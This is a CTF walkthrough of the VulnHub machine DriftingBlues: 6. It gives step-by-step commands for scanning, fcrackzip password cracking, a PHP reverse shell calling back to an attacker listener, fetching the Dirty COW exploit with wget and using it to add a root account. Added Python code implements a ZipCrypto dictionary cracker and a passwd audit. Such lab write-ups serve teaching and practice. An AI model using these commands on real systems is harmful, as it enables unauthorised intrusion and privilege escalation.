DRIFTINGBLUES: 6 WALKTHROUGH

Subodh Sharma
Jun 6, 2021

Today we are going to take on another boot2root challenge, DriftingBlues: 6. Credit for this VulnHub machine goes to 'tasiyanci'. As in every boot2root challenge, the goal is to get root access on the box.

URL: https://www.vulnhub.com/entry/driftingblues-6,672/

Security Level: Easy

Scanning

# netdiscover -i vboxnet0

Netdiscover Result

We found our target's IP address: 192.168.56.162. The next step is to scan it with nmap.

Enumeration

# nmap -v -sC -sV -sT -O -A -p- 192.168.56.162

Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-06 17:40 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating ARP Ping Scan at 17:40
Scanning 192.168.56.162 [1 port]
Completed ARP Ping Scan at 17:40, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:40
Completed Parallel DNS resolution of 1 host. at 17:40, 0.35s elapsed
Initiating Connect Scan at 17:40
Scanning 192.168.56.162 [65535 ports]
Discovered open port 80/tcp on 192.168.56.162
Completed Connect Scan at 17:40, 1.90s elapsed (65535 total ports)
Initiating Service scan at 17:40
Scanning 1 service on 192.168.56.162
Completed Service scan at 17:41, 6.08s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.56.162
NSE: Script scanning 192.168.56.162.
Initiating NSE at 17:41
Completed NSE at 17:41, 0.15s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.01s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Nmap scan report for 192.168.56.162
Host is up (0.00095s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/textpattern/textpattern
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: driftingblues
MAC Address: 08:00:27:97:52:E8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16

Uptime guess: 0.015 days (since Sun Jun 6 17:20:11 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=247 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 0.95 ms 192.168.56.162

NSE: Script Post-scanning.
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.53 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)

The nmap result shows a single open port: HTTP on 80, served by Apache 2.2.22 on Debian. So we browse to the target's IP address and explore the web page.

First I checked /robots.txt manually. It contains one entry, /textpattern/textpattern, which nmap's http-robots.txt script had already flagged. That path is the login page of the Textpattern CMS. Default credentials did not work, so I ran gobuster to find other directories.

# gobuster dir -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.162 -x php

Going through the results one by one, I found a zip file, spammer.zip, in the /spammer directory and downloaded it. Extracting it asks for a password; the archive contains a credits.txt. The default 'admin' was not the password, so I looked up how to crack a zip archive.

# fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt /root/Downloads/spammer.zip

The password is myspace4. fcrackzip only attacks the traditional PKWARE (ZipCrypto) scheme; -D -p runs a dictionary attack with rockyou.txt, and -u confirms each hit by actually unzipping, which filters out the false positives of the fast header check. Extract the archive and read credits.txt.

credits.txt gives one username, mayer, and one password, lionheart. Let's log in to the Textpattern CMS with them.
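To see what the fcrackzip step is actually doing, here is an added example (my code, not from the walkthrough or from fcrackzip): it implements the traditional PKWARE ZipCrypto cipher, builds a small encrypted archive by hand, and then runs the two checks fcrackzip uses, the fast 12-byte header check and the full-decrypt CRC check that -u adds. The archive, its credits.txt content and the wordlist are constructed for the demo; only the password myspace4 comes from the write-up.

```python
"""ZipCrypto (traditional PKWARE zip encryption) and the two checks fcrackzip uses.
Added example: not code from the walkthrough or from fcrackzip. The archive, its
credits.txt content and the wordlist are constructed for the demo."""
import io
import os
import struct
import zipfile
import zlib


def _crc_step(crc, b):
    """One byte of table-driven CRC-32 (the ZipCrypto key update), via zlib."""
    return zlib.crc32(bytes([b]), crc ^ 0xFFFFFFFF) ^ 0xFFFFFFFF


class ZipCrypto:
    """Three 32-bit keys seeded from the password, advanced by each plaintext byte."""

    def __init__(self, password: bytes):
        self.keys = [0x12345678, 0x23456789, 0x34567890]
        for b in password:
            self._update(b)

    def _update(self, b):
        k0, k1, k2 = self.keys
        k0 = _crc_step(k0, b)
        k1 = ((k1 + (k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        k2 = _crc_step(k2, k1 >> 24)
        self.keys = [k0, k1, k2]

    def _keystream_byte(self):
        t = (self.keys[2] | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update(p)  # keys advance on the plaintext byte
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def make_encrypted_zip(name: bytes, plaintext: bytes, password: bytes, salt=None) -> bytes:
    """Hand-build a one-entry, stored, ZipCrypto-encrypted archive. The 12-byte
    encryption header is 11 random bytes plus the high byte of the entry's CRC-32;
    that one byte is all a decrypter can check cheaply."""
    salt = os.urandom(11) if salt is None else bytes(salt[:11])
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    body = ZipCrypto(password).encrypt(salt + bytes([crc >> 24]) + plaintext)
    csize, usize, flags = len(body), len(plaintext), 1  # flag bit 0 = encrypted
    mtime, mdate = 36096, 21190  # 17:40 on 2021-06-06 as DOS time/date fields
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, flags, 0, mtime, mdate,
                        crc, csize, usize, len(name), 0) + name
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, flags, 0, mtime,
                          mdate, crc, csize, usize, len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1, len(central),
                       len(local) + csize, 0)
    return local + body + central + eocd


def first_entry(zip_bytes: bytes):
    """Return (crc32, encrypted body including its 12-byte header) of entry 1."""
    f = struct.unpack_from("<4sHHHHHIIIHH", zip_bytes, 0)
    if f[0] != b"PK\x03\x04" or not f[2] & 1 or f[3] != 0:
        raise ValueError("expected a stored, ZipCrypto-encrypted first entry")
    start = 30 + f[9] + f[10]  # fixed header + file name + extra field
    return f[6], zip_bytes[start:start + f[7]]


def header_check(body: bytes, crc: int, candidate: bytes) -> bool:
    """fcrackzip's fast test: decrypt only the 12-byte header and compare its last
    byte with the CRC high byte. A wrong password survives this 1 time in 256."""
    return ZipCrypto(candidate).decrypt(body[:12])[11] == crc >> 24


def full_check(body: bytes, crc: int, candidate: bytes) -> bool:
    """What -u adds: decrypt the whole entry and verify its CRC-32."""
    return zlib.crc32(ZipCrypto(candidate).decrypt(body)[12:]) & 0xFFFFFFFF == crc


def crack(zip_bytes: bytes, wordlist):
    """Dictionary attack: cheap filter first, full verification only on survivors."""
    crc, body = first_entry(zip_bytes)
    for word in wordlist:
        if header_check(body, crc, word) and full_check(body, crc, word):
            return word
    return None


def read_with_zipfile(zip_bytes: bytes, password: bytes) -> bytes:
    """Cross-check the hand-built archive with the standard library's decrypter."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(zf.namelist()[0], pwd=password)


# Constructed stand-ins for credits.txt and a slice of rockyou.txt.
CREDITS = b"mayer:lionheart\n"
WORDLIST = [b"123456", b"password", b"admin", b"letmein", b"myspace4", b"qwerty"]
```

Run crack(make_encrypted_zip(b"credits.txt", CREDITS, b"myspace4"), WORDLIST) and it returns b"myspace4". The header check compares a single byte, so roughly one wrong password in 256 passes it; against the 14 million lines of rockyou.txt that is tens of thousands of candidates, which is why fcrackzip's -u (or the CRC check here) is needed to name the real one. read_with_zipfile cross-checks the hand-built archive against the standard library's decrypter, which applies the same check byte and CRC and therefore also rejects a wrong password.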

Before uploading the PHP reverse shell, set its listener host and port (LHOST/LPORT) to the attacker machine, 192.168.56.1, and the port the listener will use, 443.

Time to upload the PHP reverse shell.

Location:

Content > Files > Upload a php file.

Textpattern keeps uploads under /textpattern/files/ and Apache executes .php files from there, so an authenticated file upload becomes code execution as the web server user. Start a listener on the attacker machine, then request the uploaded file to trigger the reverse shell.

# nc -nlvp 443

Uploaded file location:

http://192.168.56.162/textpattern/files/php-reverse-shell.php

We got a reverse shell.

Check whether we have a TTY:

# tty

Upgrade to an interactive TTY shell:

# python -c 'import pty; pty.spawn("/bin/bash")'

Check the kernel version:

# uname -a

Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux

Searching Google for this kernel turns up Dirty COW (CVE-2016-5195), a race condition in the kernel's copy-on-write handling that lets an unprivileged user write to read-only files; the Debian 3.2.78-1 kernel is vulnerable. I downloaded the Exploit-DB PoC 40839.c, the 'firefart' variant, which writes a new UID 0 user over the first line of /etc/passwd.

Time to send the .c file to the victim machine.

# python -m SimpleHTTPServer 80 (run on the attacker machine)

Back on the victim machine:

# cd /tmp

# wget http://192.168.56.1/40839.c

# ls -lah

# gcc -pthread 40839.c -o dirty -lcrypt

# ./dirty

Please enter the new password: 12345
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash

mmap: 7f3b4a2d5000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

After this we have a new UID 0 user, firefart. The PoC wrote its line over the first line of /etc/passwd, which was root's entry, and saved the original to /tmp/passwd.bak.

# su firefart

Password: 12345

# id

# cd /root

# cat flag.txt

Restore the original /etc/passwd once you are done, as the PoC reminds you. Restoring it removes the firefart entry again, so do it last:

# mv /tmp/passwd.bak /etc/passwd

WE HAVE DONE IT!
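The PoC's own reminder to restore /etc/passwd is the cleanup step; the check that goes with it, as an added example (my code, not the walkthrough's or the PoC's), audits a passwd file for what the exploit leaves behind: a missing root entry, an extra UID 0 account, a crypt() hash stored in passwd instead of shadow, and drift against the /tmp/passwd.bak the PoC wrote. The sample file contents are constructed; only the firefart line mirrors the PoC output above.

```python
"""Audit a passwd file for what the firefart Dirty COW PoC leaves behind.
Added example: not code from the walkthrough or from the PoC. The sample
passwd contents are constructed; only the firefart line mirrors the PoC output."""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list[PasswdEntry]:
    """Parse passwd(5) lines; reject malformed ones instead of guessing."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(current: str, backup: str | None = None) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    entries = parse_passwd(current)
    names = [e.name for e in entries]
    findings = []
    if "root" not in names:
        # The PoC overwrites the first line of /etc/passwd, which is root's.
        findings.append("root account missing (first line overwritten?)")
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"extra UID 0 account: {e.name}")
        if e.passwd == "":
            findings.append(f"empty password field: {e.name}")
        elif e.passwd not in ("x", "*", "!", "!!"):
            # A hash here bypasses /etc/shadow; the PoC writes a crypt() hash directly.
            findings.append(f"password hash stored in passwd, not shadow: {e.name}")
    for name in sorted({n for n in names if names.count(n) > 1}):
        findings.append(f"duplicate account name: {name}")
    if backup is not None:
        before = {e.name: e for e in parse_passwd(backup)}
        after = {e.name: e for e in entries}
        for name in sorted(before.keys() - after.keys()):
            findings.append(f"removed since backup: {name}")
        for name in sorted(after.keys() - before.keys()):
            findings.append(f"added since backup: {name}")
        for name in sorted(before.keys() & after.keys()):
            if before[name] != after[name]:
                findings.append(f"modified since backup: {name}")
    return findings


# Constructed samples: /tmp/passwd.bak as the PoC wrote it, and the live
# /etc/passwd afterwards, with root's line replaced by the firefart line.
PASSWD_BAK = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
"""
PASSWD_AFTER = PASSWD_BAK.replace(
    "root:x:0:0:root:/root:/bin/bash",
    "firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash")

if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_AFTER, PASSWD_BAK):
        print("-", finding)
```

On a live box you would call audit_passwd with the contents of /etc/passwd and /tmp/passwd.bak; on the sample it reports the missing root entry, the extra UID 0 account, the hash stored outside /etc/shadow, and the removed/added names, while the backup alone audits clean. The same comparison is worth running after the restore to confirm the file is back to what it was.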
